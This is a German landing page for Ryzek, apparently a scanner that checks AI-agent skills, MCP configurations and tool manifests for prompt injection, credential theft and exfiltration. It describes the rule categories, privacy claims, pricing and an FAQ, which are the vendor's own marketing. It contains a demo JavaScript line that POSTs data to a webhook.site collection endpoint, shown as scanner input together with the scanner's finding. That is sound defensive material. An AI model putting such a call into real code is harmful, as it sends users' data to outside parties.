Sicherheitsscans für KI-Agenten
Wissen, was ein Skill tut, bevor Ihr Agent es ausführt.
Ryzek liest Skills, MCP-Server-Konfigurationen und Tool-Manifeste und meldet Prompt Injection, versteckte Anweisungen, Diebstahl von Zugangsdaten, übermäßig weite Berechtigungen und Tools, die sich nach Ihrer Freigabe verändert haben. Jeder Befund kommt mit einem Konfidenzwert und der Begründung dafür.
Free-Plan: 20 Scans im Monat mit jeder Regel inklusive. Gescannte Dateien werden im Arbeitsspeicher gelesen und nie gespeichert.
const ENDPOINT = "https://webhook.site/0000-demo"; await fetch(ENDPOINT, { method: "POST", body: JSON.stringify(notes),});
Ryzek hat 1 Problem gefunden
Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.
webhook.site
Echte Scanner-Ausgabe, erzeugt beim Build dieser Seite.
Der Trailer
Ryzek in achtzig Sekunden.
Was Agenten still in die Hand gegeben wird — und was Ryzek Ihnen zeigt, bevor sie es ausführen.
So funktioniert es
Vom Upload zu einem Ergebnis, auf das Sie reagieren können.
Keine Installation. Anmelden, Dateien hinzufügen, lesen, was Ryzek gefunden hat und warum.
-
01 · Anmelden
Kostenloses Konto erstellen
Melden Sie sich mit einem vorhandenen Konto an. Ihr Scan-Kontingent und Ihr Tool-Verlauf begleiten Sie auf jedem Gerät.
-
02 · Dateien hinzufügen
Legen Sie ab, was Ihr Agent lädt
Skill-Ordner mit ihren Skripten, MCP-Konfigurationen, Tool-Manifeste,
package.jsonoderrequirements.txt. -
03 · Lesen
Eine Begründung erhalten, nicht nur eine Markierung
Jeder Befund zeigt seinen Schweregrad, wie sicher sich Ryzek ist, warum, den genauen Text, der ihn ausgelöst hat, und seine OWASP-Kategorie.
-
04 · Erneut scannen
Erfahren, wenn sich ein Tool ändert
Ryzek speichert einen Fingerabdruck jedes Tools — nicht die Datei —, damit ein späterer Scan Ihnen sagen kann, ob sich etwas Freigegebenes verändert hat.
Was erkannt wird
54 Regeln über fünf Risikoarten hinweg.
Jede Regel hat eine Live-Demo auf der Regelseite: die Datei, den entscheidenden Teil und was der Scanner tatsächlich meldet.
18 Regeln · Agent-Sicherheit
Text, der an die KI gerichtet ist
Prompt Injection, in Kommentaren oder unsichtbaren Zeichen versteckte Anweisungen, gefälschte Tool-Ergebnisse und Memory Poisoning.
5 Regeln · Exfiltration
Wege, auf denen Ihre Daten abfließen können
Sammelendpunkte, DNS-Tunneling, Bild-Beacons und Tools, die private Lesezugriffe mit öffentlichen Schreibzugriffen kombinieren.
7 Regeln · Zugangsdaten
Geheimnisse am falschen Ort
Fest codierte Schlüssel, Token in MCP-Konfigurationen, Zugriffe auf Zugangsdaten-Speicher und Shell-Verlauf sowie Anfragen an Cloud-Metadaten.
13 Regeln · Lieferkette
Woher der Code stammt
Nicht gepinnte und imitierte Server, bekannt verwundbare Versionen, Install-Hooks, Shadow-Server und Tools, die sich nach der Freigabe verändert haben.
11 Regeln · Ausführung
Mehr Rechte als die Aufgabe braucht
Übermäßig weite Berechtigungen, automatisch freigegebene Tools, Sandbox-Ausbrüche, Persistenz und Command Injection.
Alle Regeln
Alle Demos ansehen →
Nach Risiko filtern, die Version in klarem Deutsch lesen und das echte Ergebnis jeder Regel sehen.
Warum Ryzek
Befunde, die Sie nachprüfen können, von einem Scanner, der sagt, wo seine Grenzen liegen.
Ein Scanner, der ständig Alarm schlägt, wird ignoriert, und einer, der zu viel behauptet, bekommt unverdientes Vertrauen. Ryzek ist darauf ausgelegt, beides zu vermeiden.
Lesen Sie, was Ryzek nicht sehen kann — einschließlich Verhalten, das nur während der Serverlaufzeit auftritt, und dem Inhalt kompilierter Programme.
- Eine angegebene Begründung bei jedem Befund. Wie sicher sich die Regel ist, und warum — damit ein unsicherer Hinweis nicht wie ein bestätigter Angriff wirkt.
- Änderungserkennung. Ein Tool, das sich nach Ihrer Freigabe still verändert, wird beim nächsten Scan gemeldet.
- Ihre Dateien werden nicht behalten. Uploads werden im Arbeitsspeicher gescannt und verworfen. Wir speichern Scan-Anzahlen und Tool-Fingerabdrücke, nie Inhalte.
- Der OWASP zugeordnet. Jede Regel ordnet sich einer Kategorie der OWASP MCP Top 10 zu.
- Jede Regel in jedem Plan. Bezahlpläne bringen mehr Volumen und Automatisierung, keine zusätzliche Erkennung.
Preise
Kostenlos starten. Jede Regel inklusive.
Der Free-Plan nutzt das vollständige Regelwerk, begrenzt nach Volumen. Bezahlpläne mit höheren Limits starten bald.
Jetzt verfügbar
Free — 0 $
20 Scans im Monat, alle 54 Regeln, Änderungserkennung und herunterladbare Berichte.
Startet bald
Pro, Pro Plus und Teams
Ab 16 $ im Monat, mit 300 bis 1.500 Scans im Monat. Sehen Sie, was enthalten ist, und lassen Sie sich benachrichtigen, sobald sie verfügbar sind.
Fragen
Häufige Fragen.
Behalten Sie die gescannten Dateien?
Nein. Dateien werden über HTTPS an den Scanner gesendet, im Arbeitsspeicher gescannt und verworfen, sobald das Ergebnis vorliegt. Gespeichert wird, wie viele Scans Sie genutzt haben, und ein Fingerabdruck jedes Tools — Hashes plus seine Berechtigungskennzeichnungen —, damit wir Ihnen mitteilen können, wenn es sich ändert. Die Datenschutzerklärung enthält die Details.
Warum brauche ich ein Konto?
So gehen Ihr Scan-Kontingent und Ihr Tool-Verlauf mit Ihnen mit. Änderungserkennung funktioniert nur, wenn Ryzek sich merkt, wie ein Tool beim letzten Scan aussah.
Welche Dateien kann ich scannen?
Skill-Ordner (eine SKILL.md plus die zugehörigen Skripte), MCP-Konfigurationsdateien wie .mcp.json oder claude_desktop_config.json, JSON-Tool-Manifeste sowie package.json oder requirements.txt für Install-Hooks und verwundbare Abhängigkeiten.
Bedeutet ein sauberes Ergebnis, dass ein Skill sicher ist?
Nein — es bedeutet nur, dass keine der 54 Regeln zugetroffen hat. Ryzek liest Dateien; es führt sie nicht aus, daher liegt Verhalten, das erst zur Laufzeit oder innerhalb eines kompilierten Programms sichtbar wird, außerhalb dessen, was es erkennen kann. Ein sauberer Scan ist ein gutes Zeichen, keine Garantie.
Kann ich es in CI einsetzen?
Noch nicht. Eine CI-Integration ist für die Bezahlpläne geplant. Wenn Ihnen das wichtig ist, sagen Sie uns Bescheid — das hilft uns zu entscheiden, was zuerst kommt.
Scannen Sie die Skills, denen Ihr Agent bereits vertraut.
Registrierung und das Hinzufügen der ersten Dateien dauern eine Minute.